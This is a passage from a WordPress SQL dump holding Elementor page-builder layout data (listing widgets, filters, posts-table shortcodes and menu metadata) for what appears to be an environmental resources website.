Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_content_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_border_border\":\"double\",\"post_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"post_border_color\":\"rgba(122,122,122,0.48)\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11690,1903,'_elementor_edit_mode','builder'),(11691,1903,'_elementor_template_type','wp-page'),(11692,1903,'_elementor_version','2.7.5'),(11693,1903,'_wp_page_template','default'),(11694,1903,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_category\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, Y\"}],\"heading_title_color\":\"#000000\",\"heading_title_typography_typography\":\"custom\",\"heading_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"post_title_typography_font_weight\":\"700\",\"post_title_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]},\"post_text_color\":\"rgba(84,89,95,0.61)\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_color\":\"#ffffff\",\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"terms_link_typography_font_weight\":\"700\",\"terms_link_text_decor\":\"underline\",\"terms_link_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"arrows_style_popover_toggle\":\"custom\",\"arrows_style_box_font_color\":\"#000000\",\"arrows_style_box_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"posts_wrapper_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"posts_list_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"filter_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"hidden_item_border_active_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"featured_post_border_border\":\"solid\",\"featured_post_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"post_content_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"post_border_border\":\"double\",\"post_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"post_border_color\":\"rgba(122,122,122,0.48)\",\"post_text_typography_font_weight\":\"600\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(11712,1906,'_elementor_edit_mode','builder'),(11713,1906,'_elementor_template_type','wp-page'),(11714,1906,'_elementor_version','2.7.5'),(11715,1906,'_wp_page_template','default'),(11716,1906,'_elementor_data','[{\"id\":\"19a2d02\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"e499795\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2104bf2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Institutions\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db72bf2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"50ccf42\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"d4ac18b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"106c13c\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"2\",\"equal_height_cols\":\"true\",\"post_type\":\"institution\",\"post_ids\":\"696,663,680,93,684,95,620,635,626,630,614,673,677,621,669,690,652,659\",\"title_trimmed_ending_text\":\"...\",\"show_image\":\"\",\"show_excerpt\":\"\",\"excerpt_length\":\"\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"d6ea351\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"7f993f7\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"box_bg\":\"rgba(0,100,0,0.74)\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"#61ce70\",\"box_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_color_hover\":\"#014421\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"show_terms\":\"yes\",\"slides_to_scroll\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17e934c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"52c2165\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3d6400c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"baf14d9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(11739,1912,'_menu_item_type','post_type'),(11740,1912,'_menu_item_menu_item_parent','0'),(11741,1912,'_menu_item_object_id','335'),(11742,1912,'_menu_item_object','page'),(11743,1912,'_menu_item_target',''),(11744,1912,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(11745,1912,'_menu_item_xfn',''),(11746,1912,'_menu_item_url',''),(11748,1912,'_menu_item_template',''),(11749,1912,'_menu_item_mega_template','0'),(11750,1912,'_menu_item_nolink',''),(11751,1912,'_menu_item_category_post',''),(11752,1912,'_menu_item_megamenu',''),(11753,1912,'_menu_item_megamenu_auto_width',''),(11754,1912,'_menu_item_megamenu_col',''),(11755,1912,'_menu_item_megamenu_heading',''),(11756,1912,'_menu_item_megamenu_widgetarea','0'),(11757,1912,'_menu_item_icon',''),(11758,1912,'_elementor_controls_usage','a:0:{}'),(11759,1913,'_menu_item_type','post_type'),(11760,1913,'_menu_item_menu_item_parent','0'),(11761,1913,'_menu_item_object_id','335'),(11762,1913,'_menu_item_object','page'),(11763,1913,'_menu_item_target',''),(11764,1913,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(11765,1913,'_menu_item_xfn',''),(11766,1913,'_menu_item_url',''),(11768,1913,'_menu_item_template',''),(11769,1913,'_menu_item_mega_template','0'),(11770,1913,'_menu_item_nolink',''),(11771,1913,'_menu_item_category_post',''),(11772,1913,'_menu_item_megamenu',''),(11773,1913,'_menu_item_megamenu_auto_width',''),(11774,1913,'_menu_item_megamenu_col',''),(11775,1913,'_menu_item_megamenu_heading',''),(11776,1913,'_menu_item_megamenu_widgetarea','0'),(11777,1913,'_menu_item_icon',''),(11778,1913,'_elementor_controls_usage','a:0:{}'),(11806,91,'_wp_page_template','default'),(11807,91,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}],\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#02010129\"},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e994a25\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"20\",\"content_position\":\"middle\"},\"elements\":[{\"id\":\"9e95f9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":24.11299999999999954525264911353588104248046875,\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#0A3C11\"},\"elements\":[{\"id\":\"24db2ea\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"4062\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"typing_min_letters_count\":5,\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"82d0a07\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":75.88700000000000045474735088646411895751953125},\"elements\":[{\"id\":\"711091a\",\"elType\":\"widget\",\"settings\":{\"filter_id\":[\"4063\"],\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[{\"_id\":\"1ec2978\"}],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"filters_position\":\"inline-block\",\"filters_space_between_horizontal\":{\"unit\":\"px\",\"size\":11,\"sizes\":[]},\"checkbox_border_border\":\"solid\",\"checkbox_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"checkbox_border_color\":\"#00AA33\",\"checkbox_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"filters_list_alignment\":\"left\",\"label_typography_typography\":\"custom\",\"label_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"posts_query_id\":\"jet-smart-filters\",\"custom_same_height\":\"100%\",\"custom_link_to\":\"yes\",\"custom_postlink\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"custom_column_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"custom_row_gap\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"pagination_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"pagination_spacing_top\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"__dynamic__\":{\"custom_postlink\":\"[elementor-tag id=\\\"41d133e\\\" name=\\\"post-url\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7db54a\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a1c54ac\"}],\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"6764de0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d13439\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"prev_text\":\"Prev\",\"next_text\":\"Next\",\"pages_center_offset\":5,\"pagination_items_bg_color_hover\":\"#0A3C11\",\"pagination_items_color_hover\":\"#FFFFFF\",\"pagination_items_vertical_gap\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]},\"pagination_items_border_border\":\"solid\",\"pagination_items_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"pagination_items_border_color\":\"#0A3C11\",\"pagination_items_border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"pagination_items_alignment\":\"center\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-pagination\"}],\"isInner\":false}],\"isInner\":false}]'),(11808,1919,'_elementor_controls_usage','a:0:{}'),(11809,1919,'_elementor_edit_mode','builder'),(11810,1919,'_elementor_template_type','wp-page'),(11811,1919,'_elementor_version','2.7.5'),(11812,1919,'_wp_page_template','default'),(11813,1919,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"documents_resource\\\" \\ncolumns=\\\"title,\\nsummary,\\ntax:document_tag:Document Source,\\ntax:document_category,\\n\\\" width=\\\"auto,300px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(11814,1920,'_elementor_edit_mode','builder'),(11815,1920,'_elementor_template_type','wp-page'),(11816,1920,'_elementor_version','2.7.5'),(11817,1920,'_wp_page_template','default'),(11818,1920,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"documents_resource\\\" \\ncolumns=\\\"title,\\nsummary,\\ntax:resource_tag:Source\\/Uploaded By,\\ntax:resource_category,\\n\\\" width=\\\"auto,300px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(11821,1921,'_elementor_edit_mode','builder'),(11822,1921,'_elementor_template_type','wp-page'),(11823,1921,'_elementor_version','2.7.5'),(11824,1921,'_wp_page_template','default'),(11825,1921,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"title,\\nsummary,\\ntax:resource_tag:Source\\/Uploaded By,\\ntax:resource_category,\\n\\\" width=\\\"auto,300px,auto,auto\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(11829,1922,'_elementor_edit_mode','builder'),(11830,1922,'_elementor_template_type','wp-page'),(11831,1922,'_elementor_version','2.7.5'),(11832,1922,'_wp_page_template','default'),(11833,1922,'_elementor_data','[{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"title,\\ndescription,\\ntax:resource_tag:Source\\/Uploaded By,\\ntax:resource_category,\\n\\\" 